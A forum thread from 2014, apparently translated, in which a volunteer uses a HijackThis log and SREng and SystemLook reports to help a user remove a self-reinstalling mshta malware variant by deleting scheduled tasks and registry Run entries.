O4 - HKUS\S-1-5-21-1847916440-3850112405-2018927249-1001\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'UpdatusUser')
O4 - HKUS\S-1-5-21-1847916440-3850112405-2018927249-1001\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'UpdatusUser')
O8 - Extra context menu item: 匯出至 Microsoft Excel(&X) - res://C:\PROGRA~2\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~2\MICROS~2\Office12\REFIEBAR.DLL
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - [url]http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab[/url]
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Baidu Updater (BaiduUpdater) - Baidu.com, Inc. - C:\Program Files (x86)\Baidu\BaiduUpdate\bdupdate.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\Windows\SysWow64\IntelCpHeciSvc.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: ESET Service (ekrn) - ESET - C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: Google更新 服務 (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google更新 服務 (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Intel(R) Integrated Clock Controller Service - Intel(R) ICCS (ICCS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Integrated Clock Controller Service\ICCProxy.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: NVIDIA Display Driver Service (NVSvc) - Unknown owner - C:\Windows\system32\nvvsvc.exe (file missing)
O23 - Service: NVIDIA Update Service Daemon (nvUpdatusService) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Program Files (x86)\CyberLink\Shared Files\RichVideo.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: NVIDIA Stereoscopic 3D Driver Service (Stereo Service) - NVIDIA Corporation - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

COMBOFIX is in the next post

nick888 2014-12-12 06:08 PM

Reply to post #6

COMBOFIX
[url=https://www.sendspace.com/file/zfixk0]https://www.sendspace.com/file/zfixk0[/url]

nick888 2014-12-12 06:12 PM

Reply to post #6

Just rebooted the computer once more, it is still there...
What now?

andrew412345 2014-12-12 07:07 PM

Because what you have is a variant of the mshta malware, ordinary antivirus software will not pick it up that quickly.
For now we can only trace, step by step, which route it uses to re-add itself after each removal, so as to remove it completely. I am not from this forum's professional virus team; I just happened to pass by, saw that your post had a HijackThis log attached, and am trying to help ONLY. I do not have much time to be here, so do not be so impatient. This forum's professional team seems to have disappeared... so there is nobody to investigate together with, it is just me looking ONLY.

[color=#ff0000][u]Step 1: Download and run SREng[/u][/color]

[list][*]Download [url=http://www.kztechs.com/sreng/download.html]SREng[/url] (or [url=http://ichbhk.com/sreng2.zip]this copy[/url]) to the desktop and unzip it[*]Run [color=blue]SREng[/color] and click [color=darkgreen]Smart Scan[/color][*]Click [color=darkgreen]Scan[/color]; [color=blue]SREng[/color] will scan, please wait patiently[*]Press [color=darkgreen]Save Report[/color] and save it[/list]

[u][color=red]Step 2: Download and run SystemLook[/color][/u]

[list][*]Download [url=http://jpshortstuff.247fixes.com/SystemLook.exe][color=#000000]SystemLook[/color][/url] to the desktop and run [color=blue]SystemLook[/color][*]Paste the following into the window, then press [color=darkgreen]Look[/color]:[indent]:regfind
bv1LwaYz5ewPOfJVnYzXK7ZYjMi
2D46B6DC-2207-486B-B523-A557E6D54B47
RegWrite
SystemBoot[/indent][*]A [color=blue]SystemLook[/color] report will then pop up; save it[/list]

[u][color=red]Step 3: Paste the reports[/color][/u]

[list=1][*]SystemLook[*][color=blue]SREng[/color][/list]

nick888 2014-12-12 07:56 PM

Reply to post #10

1.
SystemLook 30.07.11 by jpshortstuff
Log created at 19:53 on 12/12/2014 by User
Administrator - Elevation successful
WARNING: SystemLook running under WOW64. Use SystemLook_x64 for accurate results.
========== regfind ==========
Searching for " bv1LwaYz5ewPOfJVnYzXK7ZYjMi"
No data found.
Searching for " 2D46B6DC-2207-486B-B523-A557E6D54B47"
No data found.
Searching for " RegWrite"
No data found.
Searching for " SystemBoot"
No data found.
-= EOF =-

nick888 2014-12-12 07:58 PM

Reply to post #10

2.
[url]https://www.sendspace.com/file/vhmcwa[/url]

andrew412345 2014-12-12 07:58 PM

Still missing the SREng report

andrew412345 2014-12-12 08:17 PM

Go to:
"Task Scheduler" > "Task Scheduler Library" >
Delete:
RegWrite
SystemBoot



Run > Regedit >
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Delete:
SystemBootBkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi
RegWriteBkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi

Go to:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
Delete:
RegWriteBkNETbv1LwaYz5ewPOfJVnYzXK7ZYjMi



If nothing unexpected comes up, that should be it.
If there are still problems, POST the SREng report and the HijackThis log again.

nick888 2014-12-13 01:41 AM

Reply to post #14

YES! No problems for now!!! A hundred thousand thanks!! THANK YOU SO MUCH!!!